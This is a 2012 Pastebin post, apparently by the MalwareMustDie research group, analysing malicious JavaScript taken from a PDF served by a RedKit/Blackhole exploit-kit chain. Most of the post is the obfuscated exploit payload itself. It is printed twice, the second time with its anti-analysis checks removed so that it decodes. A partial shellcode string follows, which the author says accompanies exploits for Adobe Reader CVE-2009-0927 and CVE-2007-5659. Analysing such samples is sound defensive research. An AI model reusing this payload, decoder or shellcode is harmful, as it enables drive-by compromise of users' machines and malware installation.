API tools faq
paste
Advertisement
MalwareMustDie

MMD - RedKit to BHEK, the BHEK Dl'ed PDF JS/Code Decoding

MalwareMustDie
Dec 30th, 2012
31,554
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 28.76 KB | None | 0 0
raw download clone embed print report
  1. =============================================
  2. #MalwareMustDie | @unixfreaxjp
  3. [0x00000000:0x00400000]>!date
  4. Sun Dec 30 21:49:08 JST 2012
  5. Case: RedKit to BHEK to Khelios: http://malwaremustdie.blogspot.jp/2012/12/what-happened-if-red-kit-team-up-with.html
  6. =============================================
  7.  
  8. // I found JS Evil code in 0x48D of this PDF:
  9.  
  10.     zxc='a';
  11.     a='353d3m3'+zxc+'1u18163o1p1k1n1n163o3936381l163o1p1m3936163o1o1m381l163o381q1k1l163o1k1k1m39163o1n1l361h163o1l1h1p35163o1p351k1h163o1h361l1h163o1o1h1p35163o1m1n1i36163o1o1n1p35163o1k1k1h1p163o1n1n3735163o1m381p35163o1h1k1k36163o1k1k1o1l163o1p1i1j36163o1i1m3838163o39391i1h163o351p3939163o1l1h1p35163o361k1k1h163o1k1q1l1n163o1o1m1h1n163o1p1o3935163o1j1l1k1l163o381l1p1m163o1m1i1o1m163o3835381q163o1m1i1l36163o1p351m1n163o1k361o1m163o1o1l1p35163o1o1p1k1m163o391m1h1k163o1p351m1n163o1j1h1o1n163o391m1h1k163o361q1k1k163o1l1i1l1q163o34373936163o361m1h1k163o37351k1k163o35381h39163o1k1p1i1h163o1o1l391j163o361i1h1p163o1h373635163o37341h1k163o38351l1h163o1k35391i163o1o1m1i39163o1m38381n163o1m381p35163o1h1k1j1l163o1n1n3737163o1h361p35163o1p371l35163o38361l1n163o1m1l3939163o1h361j1l163o371p1p35163o37371h1k163o1h1l1p35163o1h1k1p35163o3435361m163o1m1q1m38163o3835361k163o34371m1k163o1n1p1p35163o1p1h1j1h163o1h361o37163o1o1l1k1k163o1q1n1h1k163o391k3835163o1n1p1p35163o1p351h1p163o1n34391o163o1m1q1h1m163o1q1p381p163o39393939163o381j3939163o381p391q163o1h1h1h1h163o1h1h1h1h163o1m1h1m1p163o1l1h1n34163o39391n1p163o1h1h1h1h163o1m1h1h1h163o361h1p1k163o1m1h1i1q163o1p351m1m163o1p353836163o1i1h1m38163o361k1p1k163o39391h1m163o1n1p381k163o1n381n39163o1h1h1h1h163o1o1m1n1p163o1n361o1j163o1m1l1n37163o1i1n3939163o361l1p1k163o1p351h1p163o381p381p163o39391n1i163o39393939163o1h1j3835163o1o1j3835163o38361p1i163o1h1i1h1l163o1h1h1h1h163o1m361p37163o1h361j1l163o1h1l361o163o1o1j1j1l163o1n1o1n1m163o361o1o1k163o1j1l1l1l163o1o1n1h1l163o1k1k1o1j163o361o1k1j163o1j1l1l1l163o1j1h1h1p163o1o1k1j37163o1m1k1j1h163o391p1n1p163o1h1h1h1h163o39391h1h163o1h361m1n163o381p1p35163o361q1k1k163o361o1m1i163o1i371l1l163o1o1o1h1h163o1n1j1o1h163o361o1o1l163o1i371l1l163o1j381h1m163o1n361n1l163o361n1n36163o1i371l1l163o1h1h1h1q163o1p341m1q163o1h1l361i163o1p1p1k1h163o1i371l1l163o1l1i1h1l163o1n341m1i163o1n341h1h163o1m1k1h1h163o1n341m1o163o39391h1h163o1i1l1m1n163o361h1p1m163o1i1n1o1m163o1h1h1n34163o39391m1k163o1h1l1m1n163o1h1h1n34163o38351p1k163o1m1k1h36163o1m1n3939163o1p1k1h1l163o1h36361k163o1h1j3835163o1i1k3835163o1p1h1l1o163o1h1h1k39163o39341o1m163o1p1h1l1o163o1h1h1k39163o361l1o1m163o1h1h1n34163o39381n34163o1m1n3939163o381p1h1p163o39381q36163o39393939163o1l381p38163o38361h38163o39381q1p163o1h381p34163o1n391p1q163o35371h1i163o36341k1k163o1m351p34163o361n1i35163o1o1q1l1n163o1i341k1n163o1o1h1j39163o1o1l1n1p163o1o1h1o1l163o1j391k34163o1o1o1j39163o1n1n1o1m163o1n1i1n34163o1n1k1n34163o1j381o1q163o1o1m1o1j163o1n361j39163o1n381n1q163o1o1k1n35163o1k1i1j39163o1o1h1j38163o1o1h1n1p163o1o341k39163o1n1o1n1m163o1o1i1o1i163o1n1p1o34163o1k1k1k37163o1k341k1h163o1n381k1i163o1k1i1k34163o1k341n1q163o1n1q1k1i163o1k1k1k34163o1j1n1k1k163o1o1o1o1m163o1n1k1o1m163o1k1i1k37163o1k341n34163o1n381k1i163o1k1i1k34163o1k341n37163o1n361k1i163o1k1i1k34163o1k341n37163o1o1o1k1j163o1k1k1k34163o1k341k1i163o1n341k1i163o1k1i1k34163o1k341n37163o1n1o1k1i163o1n1k1j1n163o1o1o1n38163o1k1i1k37163o1j1n1n1p163o1o1j1n35163o1n1k1n1i163o1n351k37163o1o1p1n1n163o1j1n1n1q163o1n1i1o34163o1n391n1o163o1n371k37163o1o1k1o1i163o1n341o1i163o1o1o1o1p163o1h1h1n1o163o1h1h1h1h181s393o3h363n3c3i3h11383t3p3l193l341d3k3s1'+zxc+'3u3q3b3c3f38193l341f3f383h3'+zxc+'3n3b1b1j1t3k3s1'+zxc+'3u3l341c1u3l34413l341u3l341f3m3o353m3n3l3c3h3'+zxc+'191h1d3k3s1g1j1'+zxc+'1s3l383n3o3l3h113l3441393o3h363n3c3i3h11353r191'+zxc+'3u3p343l11373e3'+zxc+'1u3h383q11233l3l343s191'+zxc+'1s3p343l113p3q1u1h3r1h361h361h361h361s3p343l113437373l1u1h3r1l1h1h1h1h1h1s3p343l113j343s3f3i34371u3o3h383m36343j3819353d3m3'+zxc+'1'+zxc+'1s3p343l113m36323f383h1u3j343s3f3i34371f3f383h3'+zxc+'3n3b1b1j1s3p343l113k3s1u3437373l1e193m36323f383h1c1h3r1k1p1'+zxc+'1s3p343l113s343l3m3j1u3o3h383m36343j381913163o1q1h1q1h163o1q1h1q1h131'+zxc+'1s3s343l3m3j1u383t3p3l193s343l3m3j1d3k3s1'+zxc+'1s3p343l11363i3o3h3n1j1u193p3q1e1h3r1l1h1h1h1h1h1'+zxc+'1g3437373l1s393i3l193p343l11363i3o3h3n1u1h1s363i3o3h3n1t363i3o3h3n1j1s363i3o3h3n1c1c1'+zxc+'3u373e3'+zxc+'2t363i3o3h3n301u3s343l3m3j1c3j343s3f3i3437413p343l113i3p383l393f3i3q1u3o3h383m36343j381913163o1h361h36163o1h361h36131'+zxc+'1s3q3b3c3f38193i3p383l393f3i3q1f3f383h3'+zxc+'3n3b1t1l1l1q1m1j1'+zxc+'3u3i3p383l393f3i3q1c1u3i3p383l393f3i3q413n3b3c3m1f363i3f3f34352l3n3i3l381u253i3f3f34351f363i3f3f38363n273g343c3f2b3h393i193u3m3o353d1r13131d3g3m3'+zxc+'1r3i3p383l393f3i3q411'+zxc+'41393o3h363n3c3i3h113j3l3c3h3n39191'+zxc+'3u3h3i3j1u3o3h383m36343j381913163o1h231h23163o1h231h23163o1h231h23163o1h231h23131'+zxc+'1s3p343l113j343s3f3i34371u3o3h383m36343j3819353d3m3'+zxc+'1'+zxc+'1s3b38343j353f3i363e1u3h3i3j1c3j343s3f3i34371s353c3'+zxc+'353f3i363e1u3o3h383m36343j381913163o1h231h23163o1h231h23131'+zxc+'1s3b383437383l3m3c3t381u1j1h1s3m3j3l343s1u3b383437383l3m3c3t381c3b38343j353f3i363e1f3f383h3'+zxc+'3n3b1s3q3b3c3f3819353c3'+zxc+'353f3i363e1f3f383h3'+zxc+'3n3b1t3m3j3l343s1'+zxc+'3u353c3'+zxc+'353f3i363e1c1u353c3'+zxc+'353f3i363e41393c3f3f353f3i363e1u353c3'+zxc+'353f3i363e1f3m3o353m3n3l3c3h3'+zxc+'191h1d3m3j3l343s1'+zxc+'1s353f3i363e1u353c3'+zxc+'353f3i363e1f3m3o353m3n3l3c3h3'+zxc+'191h1d353c3'+zxc+'353f3i363e1f3f383h3'+zxc+'3n3b1e3m3j3l343s1'+zxc+'1s3q3b3c3f3819353f3i363e1f3f383h3'+zxc+'3n3b1c3m3j3l343s1t1h3r1l1h1h1h1h1'+zxc+'3u353f3i363e1u353f3i363e1c353f3i363e1c393c3f3f353f3i363e413g383g1u3h383q11233l3l343s191'+zxc+'1s393i3l193c1u1h1s3c1t1i1l1h1h1s3c1c1c1'+zxc+'3u3g383g2t3c301u353f3i363e1c3b38343j353f3i363e413p343l113h3o3g1u1i1j1q1q1q1q1q1q1q1q1q1q1q1q1q1q1q1q1q1q1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1s3o3n3c3f1f3j3l3c3h3n391913161l1m1h1h1h39131d3h3o3g1'+zxc+'41393o3h363n3c3i3h113'+zxc+'383n3c363i3h191'+zxc+'3u3p343l11343l3l3s1u3h383q11233l3l343s191'+zxc+'1s3c3919343j3j1f373i361f253i3f3f34351f3'+zxc+'383n2b363i3h1'+zxc+'3u3p343l113j343s3f3i34371u3o3h383m36343j3819353d3m3'+zxc+'1'+zxc+'1s3p343l113b2p3k1m1h1h252g1u3j343s3f3i34371f3f383h3'+zxc+'3n3b1b1j1s3p343l113k3s1u1h3r1l1h1h1h1h1h1e193b2p3k1m1h1h252g1c1h3r1k1p1'+zxc+'1s3p343l113s343l3m3j1u3o3h383m36343j381913163o1q1h1q1h163o1q1h1q1h131'+zxc+'1s3s343l3m3j1u383t3p3l193s343l3m3j1d3k3s1'+zxc+'1s3p343l113j1m233d2d1n1m391u191h3r1h361h361h361h361e1h3r1l1h1h1h1h1h1'+zxc+'1g1h3r1l1h1h1h1h1h1s393i3l193p343l113p3k362j261q1n3s1u1h1s3p3k362j261q1n3s1t3j1m233d2d1n1m391s3p3k362j261q1n3s1c1c1'+zxc+'3u343l3l3s2t3p3k362j261q1n3s301u3s343l3m3j1c3j343s3f3i3437413p343l113n2n2f3b2g35293q1u3o3h383m36343j381913161h1q131'+zxc+'1s3q3b3c3f38193n2n2f3b2g35293q1f3f383h3'+zxc+'3n3b1t1h3r1l1h1h1h1'+zxc+'3u3n2n2f3b2g35293q1c1u3n2n2f3b2g35293q413n2n2f3b2g35293q1u132g1f131c3n2n2f3b2g35293q1s343j3j1f373i361f253i3f3f34351f3'+zxc+'383n2b363i3h193n2n2f3b2g35293q1'+zxc+'4141342i3f3o3'+zxc+'3c3h3m1u343j3j1f3j3f3o3'+zxc+'2b3h3m1s3p343l113m3p1u3j343l3m382b3h3n19343j3j1f3p3c383q383l2o383l3m3c3i3h1f3n3i2l3n3l3c3h3'+zxc+'191'+zxc+'1f363b343l233n191h1'+zxc+'1'+zxc+'1s393i3l193p343l113c1u1h1s3c1t342i3f3o3'+zxc+'3c3h3m1f3f383h3'+zxc+'3n3b1s3c1c1c1'+zxc+'3u3c3919342i3f3o3'+zxc+'3c3h3m2t3c301f3h343g381u1u18272l363l3c3j3n181'+zxc+'3u3p343l113f3p1u342i3f3o3'+zxc+'3c3h3m2t3c301f3p383l3m3c3i3h41413c3919193f3p1u1u1q1'+zxc+'404019193m3p1u1u1p1'+zxc+'1717193f3p1t1u1p1f1i1j1'+zxc+'1'+zxc+'1'+zxc+'3u3'+zxc+'383n3c363i3h191'+zxc+'41383f3m38113c39193f3p1u1u1o1f1i1'+zxc+'3u3j3l3c3h3n39191'+zxc+'41383f3m38113c391919193m3p1u1u1n1'+zxc+'4040193m3p1u1u1o1'+zxc+'1'+zxc+'1717193f3p1t1o1f1i1i1'+zxc+'1'+zxc+'3u353r191'+zxc+'41383f3m38113c3919193f3p201u1q1f1i1'+zxc+'4040193f3p1t1u1q1f1j1'+zxc+'4040193f3p201u1p1f1i1k1'+zxc+'4040193f3p1t1u1p1f1i1o1'+zxc+'1'+zxc+'3u393o3h363n3c3i3h1134191'+zxc+'3u3o3n3c3f1f3j3l3c3h3n3719183j221i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i111r113s3s3s3s1i1i1i181d3h383q1126343n38191'+zxc+'1'+zxc+'413p343l113b1u343j3j1f3j3f3o3'+zxc+'2b3h3m1s393i3l193p343l11391u1h1s391t3b1f3f383h3'+zxc+'3n3b1s391c1c1'+zxc+'3u3c39193b2t39301f3h343g381u1u18272l363l3c3j3n181'+zxc+'3u3p343l113c1u3b2t39301f3p383l3m3c3i3h41413c3919193c201p1f1i1j1'+zxc+'1717193c1t1p1f1j1'+zxc+'1'+zxc+'3u361u3h383q11233l3l343s191'+zxc+'1s3p343l11371u3o3h383m36343j381918163o1q1h1q1h163o1q1h1q1h181'+zxc+'1s3p343l11381u3o3h383m36343j3819353d3m3'+zxc+'1'+zxc+'1s3q3b3c3f3819371f3f383h3'+zxc+'3n3b1t1u1h3r1p1h1h1h1'+zxc+'3u371c1u3741371u371f3m3o353m3n3l191h1d1h3r1p1h1h1h1e381f3f383h3'+zxc+'3n3b1'+zxc+'1s393i3l19391u1h1s391t1j1q1h1h1s391c1c1'+zxc+'3u362t39301u371c384134191'+zxc+'1s34191'+zxc+'1s3n3l3s3u3n3b3c3m1f3g38373c341f3h383q2i3f343s383l193h3o3f3f1'+zxc+'4136343n363b19381'+zxc+'3u4134191'+zxc+'4141';
  12.     s='';
  13.     p=parseInt;
  14.     for(i=0;i<a.length;i+=2){
  15.         var jj = 0;
  16.         if((app.newDoc+'asd')['substr'](1,3)=='fun'){jj=1}
  17.         if (jj==1) s+=String.fromCharCode(p(a[i]+a[i+01],31));
  18.     }
  19.     ev=String.fromCharCode(100+1,118,97,108);
  20.     if(020!==0x10)ev=13;
  21.     t=this;
  22.     zxczxc={t:t}.t;
  23.     zxczxc[ev](s);
  24.  
  25. // I "modified" the code to strip the traps & go
  26. // straight to the point...
  27.  
  28. zxc='a';
  29. a='353d3m3'+zxc+'1u18163o1p1k1n1n163o3936381l163o1p1m3936163o1o1m381l163o381q1k1l163o1k1k1m39163o1n1l361h163o1l1h1p35163o1p351k1h163o1h361l1h163o1o1h1p35163o1m1n1i36163o1o1n1p35163o1k1k1h1p163o1n1n3735163o1m381p35163o1h1k1k36163o1k1k1o1l163o1p1i1j36163o1i1m3838163o39391i1h163o351p3939163o1l1h1p35163o361k1k1h163o1k1q1l1n163o1o1m1h1n163o1p1o3935163o1j1l1k1l163o381l1p1m163o1m1i1o1m163o3835381q163o1m1i1l36163o1p351m1n163o1k361o1m163o1o1l1p35163o1o1p1k1m163o391m1h1k163o1p351m1n163o1j1h1o1n163o391m1h1k163o361q1k1k163o1l1i1l1q163o34373936163o361m1h1k163o37351k1k163o35381h39163o1k1p1i1h163o1o1l391j163o361i1h1p163o1h373635163o37341h1k163o38351l1h163o1k35391i163o1o1m1i39163o1m38381n163o1m381p35163o1h1k1j1l163o1n1n3737163o1h361p35163o1p371l35163o38361l1n163o1m1l3939163o1h361j1l163o371p1p35163o37371h1k163o1h1l1p35163o1h1k1p35163o3435361m163o1m1q1m38163o3835361k163o34371m1k163o1n1p1p35163o1p1h1j1h163o1h361o37163o1o1l1k1k163o1q1n1h1k163o391k3835163o1n1p1p35163o1p351h1p163o1n34391o163o1m1q1h1m163o1q1p381p163o39393939163o381j3939163o381p391q163o1h1h1h1h163o1h1h1h1h163o1m1h1m1p163o1l1h1n34163o39391n1p163o1h1h1h1h163o1m1h1h1h163o361h1p1k163o1m1h1i1q163o1p351m1m163o1p353836163o1i1h1m38163o361k1p1k163o39391h1m163o1n1p381k163o1n381n39163o1h1h1h1h163o1o1m1n1p163o1n361o1j163o1m1l1n37163o1i1n3939163o361l1p1k163o1p351h1p163o381p381p163o39391n1i163o39393939163o1h1j3835163o1o1j3835163o38361p1i163o1h1i1h1l163o1h1h1h1h163o1m361p37163o1h361j1l163o1h1l361o163o1o1j1j1l163o1n1o1n1m163o361o1o1k163o1j1l1l1l163o1o1n1h1l163o1k1k1o1j163o361o1k1j163o1j1l1l1l163o1j1h1h1p163o1o1k1j37163o1m1k1j1h163o391p1n1p163o1h1h1h1h163o39391h1h163o1h361m1n163o381p1p35163o361q1k1k163o361o1m1i163o1i371l1l163o1o1o1h1h163o1n1j1o1h163o361o1o1l163o1i371l1l163o1j381h1m163o1n361n1l163o361n1n36163o1i371l1l163o1h1h1h1q163o1p341m1q163o1h1l361i163o1p1p1k1h163o1i371l1l163o1l1i1h1l163o1n341m1i163o1n341h1h163o1m1k1h1h163o1n341m1o163o39391h1h163o1i1l1m1n163o361h1p1m163o1i1n1o1m163o1h1h1n34163o39391m1k163o1h1l1m1n163o1h1h1n34163o38351p1k163o1m1k1h36163o1m1n3939163o1p1k1h1l163o1h36361k163o1h1j3835163o1i1k3835163o1p1h1l1o163o1h1h1k39163o39341o1m163o1p1h1l1o163o1h1h1k39163o361l1o1m163o1h1h1n34163o39381n34163o1m1n3939163o381p1h1p163o39381q36163o39393939163o1l381p38163o38361h38163o39381q1p163o1h381p34163o1n391p1q163o35371h1i163o36341k1k163o1m351p34163o361n1i35163o1o1q1l1n163o1i341k1n163o1o1h1j39163o1o1l1n1p163o1o1h1o1l163o1j391k34163o1o1o1j39163o1n1n1o1m163o1n1i1n34163o1n1k1n34163o1j381o1q163o1o1m1o1j163o1n361j39163o1n381n1q163o1o1k1n35163o1k1i1j39163o1o1h1j38163o1o1h1n1p163o1o341k39163o1n1o1n1m163o1o1i1o1i163o1n1p1o34163o1k1k1k37163o1k341k1h163o1n381k1i163o1k1i1k34163o1k341n1q163o1n1q1k1i163o1k1k1k34163o1j1n1k1k163o1o1o1o1m163o1n1k1o1m163o1k1i1k37163o1k341n34163o1n381k1i163o1k1i1k34163o1k341n37163o1n361k1i163o1k1i1k34163o1k341n37163o1o1o1k1j163o1k1k1k34163o1k341k1i163o1n341k1i163o1k1i1k34163o1k341n37163o1n1o1k1i163o1n1k1j1n163o1o1o1n38163o1k1i1k37163o1j1n1n1p163o1o1j1n35163o1n1k1n1i163o1n351k37163o1o1p1n1n163o1j1n1n1q163o1n1i1o34163o1n391n1o163o1n371k37163o1o1k1o1i163o1n341o1i163o1o1o1o1p163o1h1h1n1o163o1h1h1h1h181s393o3h363n3c3i3h11383t3p3l193l341d3k3s1'+zxc+'3u3q3b3c3f38193l341f3f383h3'+zxc+'3n3b1b1j1t3k3s1'+zxc+'3u3l341c1u3l34413l341u3l341f3m3o353m3n3l3c3h3'+zxc+'191h1d3k3s1g1j1'+zxc+'1s3l383n3o3l3h113l3441393o3h363n3c3i3h11353r191'+zxc+'3u3p343l11373e3'+zxc+'1u3h383q11233l3l343s191'+zxc+'1s3p343l113p3q1u1h3r1h361h361h361h361s3p343l113437373l1u1h3r1l1h1h1h1h1h1s3p343l113j343s3f3i34371u3o3h383m36343j3819353d3m3'+zxc+'1'+zxc+'1s3p343l113m36323f383h1u3j343s3f3i34371f3f383h3'+zxc+'3n3b1b1j1s3p343l113k3s1u3437373l1e193m36323f383h1c1h3r1k1p1'+zxc+'1s3p343l113s343l3m3j1u3o3h383m36343j381913163o1q1h1q1h163o1q1h1q1h131'+zxc+'1s3s343l3m3j1u383t3p3l193s343l3m3j1d3k3s1'+zxc+'1s3p343l11363i3o3h3n1j1u193p3q1e1h3r1l1h1h1h1h1h1'+zxc+'1g3437373l1s393i3l193p343l11363i3o3h3n1u1h1s363i3o3h3n1t363i3o3h3n1j1s363i3o3h3n1c1c1'+zxc+'3u373e3'+zxc+'2t363i3o3h3n301u3s343l3m3j1c3j343s3f3i3437413p343l113i3p383l393f3i3q1u3o3h383m36343j381913163o1h361h36163o1h361h36131'+zxc+'1s3q3b3c3f38193i3p383l393f3i3q1f3f383h3'+zxc+'3n3b1t1l1l1q1m1j1'+zxc+'3u3i3p383l393f3i3q1c1u3i3p383l393f3i3q413n3b3c3m1f363i3f3f34352l3n3i3l381u253i3f3f34351f363i3f3f38363n273g343c3f2b3h393i193u3m3o353d1r13131d3g3m3'+zxc+'1r3i3p383l393f3i3q411'+zxc+'41393o3h363n3c3i3h113j3l3c3h3n39191'+zxc+'3u3h3i3j1u3o3h383m36343j381913163o1h231h23163o1h231h23163o1h231h23163o1h231h23131'+zxc+'1s3p343l113j343s3f3i34371u3o3h383m36343j3819353d3m3'+zxc+'1'+zxc+'1s3b38343j353f3i363e1u3h3i3j1c3j343s3f3i34371s353c3'+zxc+'353f3i363e1u3o3h383m36343j381913163o1h231h23163o1h231h23131'+zxc+'1s3b383437383l3m3c3t381u1j1h1s3m3j3l343s1u3b383437383l3m3c3t381c3b38343j353f3i363e1f3f383h3'+zxc+'3n3b1s3q3b3c3f3819353c3'+zxc+'353f3i363e1f3f383h3'+zxc+'3n3b1t3m3j3l343s1'+zxc+'3u353c3'+zxc+'353f3i363e1c1u353c3'+zxc+'353f3i363e41393c3f3f353f3i363e1u353c3'+zxc+'353f3i363e1f3m3o353m3n3l3c3h3'+zxc+'191h1d3m3j3l343s1'+zxc+'1s353f3i363e1u353c3'+zxc+'353f3i363e1f3m3o353m3n3l3c3h3'+zxc+'191h1d353c3'+zxc+'353f3i363e1f3f383h3'+zxc+'3n3b1e3m3j3l343s1'+zxc+'1s3q3b3c3f3819353f3i363e1f3f383h3'+zxc+'3n3b1c3m3j3l343s1t1h3r1l1h1h1h1h1'+zxc+'3u353f3i363e1u353f3i363e1c353f3i363e1c393c3f3f353f3i363e413g383g1u3h383q11233l3l343s191'+zxc+'1s393i3l193c1u1h1s3c1t1i1l1h1h1s3c1c1c1'+zxc+'3u3g383g2t3c301u353f3i363e1c3b38343j353f3i363e413p343l113h3o3g1u1i1j1q1q1q1q1q1q1q1q1q1q1q1q1q1q1q1q1q1q1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1s3o3n3c3f1f3j3l3c3h3n391913161l1m1h1h1h39131d3h3o3g1'+zxc+'41393o3h363n3c3i3h113'+zxc+'383n3c363i3h191'+zxc+'3u3p343l11343l3l3s1u3h383q11233l3l343s191'+zxc+'1s3c3919343j3j1f373i361f253i3f3f34351f3'+zxc+'383n2b363i3h1'+zxc+'3u3p343l113j343s3f3i34371u3o3h383m36343j3819353d3m3'+zxc+'1'+zxc+'1s3p343l113b2p3k1m1h1h252g1u3j343s3f3i34371f3f383h3'+zxc+'3n3b1b1j1s3p343l113k3s1u1h3r1l1h1h1h1h1h1e193b2p3k1m1h1h252g1c1h3r1k1p1'+zxc+'1s3p343l113s343l3m3j1u3o3h383m36343j381913163o1q1h1q1h163o1q1h1q1h131'+zxc+'1s3s343l3m3j1u383t3p3l193s343l3m3j1d3k3s1'+zxc+'1s3p343l113j1m233d2d1n1m391u191h3r1h361h361h361h361e1h3r1l1h1h1h1h1h1'+zxc+'1g1h3r1l1h1h1h1h1h1s393i3l193p343l113p3k362j261q1n3s1u1h1s3p3k362j261q1n3s1t3j1m233d2d1n1m391s3p3k362j261q1n3s1c1c1'+zxc+'3u343l3l3s2t3p3k362j261q1n3s301u3s343l3m3j1c3j343s3f3i3437413p343l113n2n2f3b2g35293q1u3o3h383m36343j381913161h1q131'+zxc+'1s3q3b3c3f38193n2n2f3b2g35293q1f3f383h3'+zxc+'3n3b1t1h3r1l1h1h1h1'+zxc+'3u3n2n2f3b2g35293q1c1u3n2n2f3b2g35293q413n2n2f3b2g35293q1u132g1f131c3n2n2f3b2g35293q1s343j3j1f373i361f253i3f3f34351f3'+zxc+'383n2b363i3h193n2n2f3b2g35293q1'+zxc+'4141342i3f3o3'+zxc+'3c3h3m1u343j3j1f3j3f3o3'+zxc+'2b3h3m1s3p343l113m3p1u3j343l3m382b3h3n19343j3j1f3p3c383q383l2o383l3m3c3i3h1f3n3i2l3n3l3c3h3'+zxc+'191'+zxc+'1f363b343l233n191h1'+zxc+'1'+zxc+'1s393i3l193p343l113c1u1h1s3c1t342i3f3o3'+zxc+'3c3h3m1f3f383h3'+zxc+'3n3b1s3c1c1c1'+zxc+'3u3c3919342i3f3o3'+zxc+'3c3h3m2t3c301f3h343g381u1u18272l363l3c3j3n181'+zxc+'3u3p343l113f3p1u342i3f3o3'+zxc+'3c3h3m2t3c301f3p383l3m3c3i3h41413c3919193f3p1u1u1q1'+zxc+'404019193m3p1u1u1p1'+zxc+'1717193f3p1t1u1p1f1i1j1'+zxc+'1'+zxc+'1'+zxc+'3u3'+zxc+'383n3c363i3h191'+zxc+'41383f3m38113c39193f3p1u1u1o1f1i1'+zxc+'3u3j3l3c3h3n39191'+zxc+'41383f3m38113c391919193m3p1u1u1n1'+zxc+'4040193m3p1u1u1o1'+zxc+'1'+zxc+'1717193f3p1t1o1f1i1i1'+zxc+'1'+zxc+'3u353r191'+zxc+'41383f3m38113c3919193f3p201u1q1f1i1'+zxc+'4040193f3p1t1u1q1f1j1'+zxc+'4040193f3p201u1p1f1i1k1'+zxc+'4040193f3p1t1u1p1f1i1o1'+zxc+'1'+zxc+'3u393o3h363n3c3i3h1134191'+zxc+'3u3o3n3c3f1f3j3l3c3h3n3719183j221i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i111r113s3s3s3s1i1i1i181d3h383q1126343n38191'+zxc+'1'+zxc+'413p343l113b1u343j3j1f3j3f3o3'+zxc+'2b3h3m1s393i3l193p343l11391u1h1s391t3b1f3f383h3'+zxc+'3n3b1s391c1c1'+zxc+'3u3c39193b2t39301f3h343g381u1u18272l363l3c3j3n181'+zxc+'3u3p343l113c1u3b2t39301f3p383l3m3c3i3h41413c3919193c201p1f1i1j1'+zxc+'1717193c1t1p1f1j1'+zxc+'1'+zxc+'3u361u3h383q11233l3l343s191'+zxc+'1s3p343l11371u3o3h383m36343j381918163o1q1h1q1h163o1q1h1q1h181'+zxc+'1s3p343l11381u3o3h383m36343j3819353d3m3'+zxc+'1'+zxc+'1s3q3b3c3f3819371f3f383h3'+zxc+'3n3b1t1u1h3r1p1h1h1h1'+zxc+'3u371c1u3741371u371f3m3o353m3n3l191h1d1h3r1p1h1h1h1e381f3f383h3'+zxc+'3n3b1'+zxc+'1s393i3l19391u1h1s391t1j1q1h1h1s391c1c1'+zxc+'3u362t39301u371c384134191'+zxc+'1s34191'+zxc+'1s3n3l3s3u3n3b3c3m1f3g38373c341f3h383q2i3f343s383l193h3o3f3f1'+zxc+'4136343n363b19381'+zxc+'3u4134191'+zxc+'4141';
  30.     s='';
  31.     p=parseInt;
  32.     for(i=0;i<a.length;i+=2){
  33.         var jj = 0;
  34.         //if((app.newDoc+'asd')['substr'](1,3)=='fun')
  35.                 {jj=1}
  36.         if (jj==1) s+=String.fromCharCode(p(a[i]+a[i+01],31));}
  37. document.write(s);
  38.  
  39.     ↓↓↓
  40.  
  41. // Ended up with the
  42. //1) shellcode and
  43. //2) Exploit code of Collab.getIcon Exploit CVE-2009-0927 + Collab.collectEmailInfo CVE-2007-5659
  44.  
  45.  
  46.  
  47. // shellcode...
  48.  
  49. bjsg='%u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b%u8b30%u0c40%u708b%u561c%u768b%u3308%u66db%u5e8b%u033c%u3374%u812c%u15ee%uff10%ub8ff%u408b%uc330%u3946%u7506%u87fb%u2434%ue485%u5175%uebe9%u514c%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%uadfc%uc503%udb33%ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee6%u5e8b%u0324%u66dd%u0c8b%u8d4b%uec46%u54ff%u0c24%ud88b%udd03%u048b%u038b%uabc5%u595e%uebc3%uad53%u688b%u8020%u0c7d%u7433%u9603%uf3eb%u688b%u8b08%u6af7%u5905%u98e8%uffff%ue2ff%ue8f9%u0000%u0000%u5058%u406a%uff68%u0000%u5000%uc083%u5019%u8b55%u8bec%u105e%uc383%uff05%u68e3%u6e6f%u0000%u7568%u6c72%u546d%u16ff%uc483%u8b08%ue8e8%uff61%uffff%u02eb%u72eb%